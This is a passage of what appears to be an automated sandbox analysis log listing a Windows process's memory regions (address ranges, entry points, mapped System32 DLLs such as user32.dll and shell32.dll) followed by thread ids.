0x7ffd2e1a0000 end_va = 0x7ffd2e1fafff entry_point = 0x7ffd2e1b7530 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 479 start_va = 0x7ffd2e270000 end_va = 0x7ffd2e3cbfff entry_point = 0x7ffd2e2ae040 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 480 start_va = 0x7ffd2e800000 end_va = 0x7ffd2e8bdfff entry_point = 0x7ffd2e81afa0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 481 start_va = 0x7ffd2e9e0000 end_va = 0x7ffd2ea15fff entry_point = 0x7ffd2e9e1310 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 482 start_va = 0x7ffd2ea90000 end_va = 0x7ffd2ebddfff entry_point = 0x7ffd2ea99d90 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 483 start_va = 0x7ffd2ece0000 end_va = 0x7ffd2ef5bfff entry_point = 0x7ffd2edb3700 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" Region: id = 484 start_va = 0x5d4d7c0000 end_va = 0x5d4d7c0fff entry_point = 0x0 region_type = private name = "private_0x0000005d4d7c0000" filename = "" Region: id = 485 start_va = 0x5d4d7d0000 end_va = 0x5d4d7d0fff entry_point = 0x0 region_type = private name = "private_0x0000005d4d7d0000" filename = "" Region: id = 486 start_va = 0x5d4d900000 end_va = 0x5d4da87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4d900000" filename = "" Region: id = 487 start_va = 0x5d4daa0000 end_va = 0x5d4dc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4daa0000" filename = "" Region: id = 488 start_va = 0x5d4dc30000 end_va = 0x5d4f02ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4dc30000" filename = "" Region: id = 489 start_va = 0x5d4f050000 end_va = 0x5d4f05ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4f050000" filename = "" Region: id = 490 start_va = 0x5d4f060000 end_va = 0x5d4f09ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4f060000" filename = "" Region: id = 491 start_va = 0x7ff768c59000 end_va = 0x7ff768c5afff entry_point = 0x0 region_type = private name = "private_0x00007ff768c59000" filename = "" Region: id = 492 start_va = 0x7ffd2b9b0000 end_va = 0x7ffd2b9c2fff entry_point = 0x7ffd2b9b5130 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 493 start_va = 0x7ffd2b9d0000 end_va = 0x7ffd2ba19fff entry_point = 0x7ffd2b9d3460 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" Region: id = 494 start_va = 0x7ffd2ba20000 end_va = 0x7ffd2ba2efff entry_point = 0x7ffd2ba23220 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" Region: id = 495 start_va = 0x7ffd2bc60000 end_va = 0x7ffd2c287fff entry_point = 0x7ffd2be1c1e0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" Region: id = 496 start_va = 0x7ffd2c390000 end_va = 0x7ffd2c442fff entry_point = 0x7ffd2c3d1b20 region_type = mapped_file name = "SHCore.dll" filename = "\\Windows\\System32\\SHCore.dll" Region: id = 497 start_va = 0x7ffd2c630000 end_va = 0x7ffd2c6d5fff entry_point = 0x7ffd2c6461e0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 498 start_va = 0x7ffd2cbb0000 end_va = 0x7ffd2e0d4fff entry_point = 0x7ffd2cd02e70 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 499 start_va = 0x7ffd2e980000 end_va = 0x7ffd2e9d0fff entry_point = 0x7ffd2e98ee30 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 500 start_va = 0x7ffd2a260000 end_va = 0x7ffd2a2f5fff entry_point = 0x7ffd2a2839e0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 501 start_va = 0x5d4d660000 end_va = 0x5d4d69ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4d660000" filename = "" Region: id = 502 start_va = 0x5d4d7e0000 end_va = 0x5d4d7e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4d7e0000" filename = "" Region: id = 503 start_va = 0x5d4f0a0000 end_va = 0x5d4f157fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4f0a0000" filename = "" Region: id = 504 start_va = 0x5d4f160000 end_va = 0x5d4f16ffff entry_point = 0x0 region_type = private name = "private_0x0000005d4f160000" filename = "" Region: id = 505 start_va = 0x5d4f170000 end_va = 0x5d4f4a6fff entry_point = 0x5d4f170000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 506 start_va = 0x5d4f4b0000 end_va = 0x5d4f6c1fff entry_point = 0x0 region_type = private name = "private_0x0000005d4f4b0000" filename = "" Region: id = 507 start_va = 0x5d4f6d0000 end_va = 0x5d4f8e9fff entry_point = 0x0 region_type = private name = "private_0x0000005d4f6d0000" filename = "" Region: id = 508 start_va = 0x5d4f8f0000 end_va = 0x5d4f9fffff entry_point = 0x0 region_type = private name = "private_0x0000005d4f8f0000" filename = "" Region: id = 509 start_va = 0x5d4fa00000 end_va = 0x5d4fc1dfff entry_point = 0x0 region_type = private name = "private_0x0000005d4fa00000" filename = "" Region: id = 510 start_va = 0x5d4fc20000 end_va = 0x5d4fd2bfff entry_point = 0x0 region_type = private name = "private_0x0000005d4fc20000" filename = "" Region: id = 511 start_va = 0x7ff768c5d000 end_va = 0x7ff768c5efff entry_point = 0x0 region_type = private name = "private_0x00007ff768c5d000" filename = "" Region: id = 512 start_va = 0x7ffd29a00000 end_va = 0x7ffd29a21fff entry_point = 0x7ffd29a03360 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 513 start_va = 0x7ffd29fd0000 end_va = 0x7ffd29fe2fff entry_point = 0x7ffd29fd2870 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 514 start_va = 0x7ffd2adf0000 end_va = 0x7ffd2ae47fff entry_point = 0x7ffd2ae011e0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 515 start_va = 0x5d4d7f0000 end_va = 0x5d4d7f6fff entry_point = 0x0 region_type = private name = "private_0x0000005d4d7f0000" filename = "" Region: id = 516 start_va = 0x5d4f030000 end_va = 0x5d4f034fff entry_point = 0x5d4f030000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" Region: id = 517 start_va = 0x5d4f040000 end_va = 0x5d4f040fff entry_point = 0x5d4f040000 region_type = mapped_file name = "ConhostV2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" Region: id = 518 start_va = 0x5d4fd30000 end_va = 0x5d4fd31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005d4fd30000" filename = "" Region: id = 519 start_va = 0x7ffd24010000 end_va = 0x7ffd24283fff entry_point = 0x7ffd2407d490 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" Thread: id = 12 os_tid = 0xcc0 Thread: id = 13 os_tid = 0xccc Thread: id = 14 os_tid = 0xce0 Thread: id = 15 os_tid = 0xcf0